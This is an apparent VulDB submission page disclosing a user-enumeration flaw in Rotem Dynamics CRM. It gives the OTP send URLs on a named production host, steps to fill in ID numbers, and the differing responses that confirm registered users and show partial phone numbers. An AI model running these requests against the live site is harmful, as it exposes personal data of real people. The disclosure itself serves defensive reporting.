| عنوان | Rotem Dynamics CRM User / Member Enumeration Vulnerability |
|---|
| الوصف | Rotem CRM is vulnerable, allowing user enumeration via the OTP URI interface.
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CWE-203: Observable Discrepancy
No version details due to closed source and lack of cooperation. Probable to apply to all versions.
Example:
https://rotemcrm.idfwo.org/LandingPages/api/otp/send?id=[ID][ampersand]method=sms
https://rotemcrm.idfwo.org/LandingPages/api/otp/send?id=[ID][ampersand]method=email
1. Replace [ID} with the ID number
2. Replace [ampersand] with the ampersand symbol (prohibited by your vulnerability report form)
Successful response (for this implementation):
{"Status":"Sent OTP","SentTo":"שמספרו לטלפון אישור קוד נשלח: XXXXXXX123"}
Unsuccessful response (user not found):
{"תעודת הזהות לא נמצאה, ניתן ליצור קשר בטלפון 03-6918403":"Error {" |
|---|
| المستخدم | Anonymous User |
|---|
| ارسال | 27/06/2023 03:27 PM (3 سنوات منذ) |
|---|
| الاعتدال | 06/07/2023 07:36 PM (9 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 233253 [Rotem Dynamics Rotem CRM حتى 20230729 OTP URI Interface send?id=[ID][ampersand]method=sms الكشف عن المعلومات] |
|---|
| النقاط | 17 |
|---|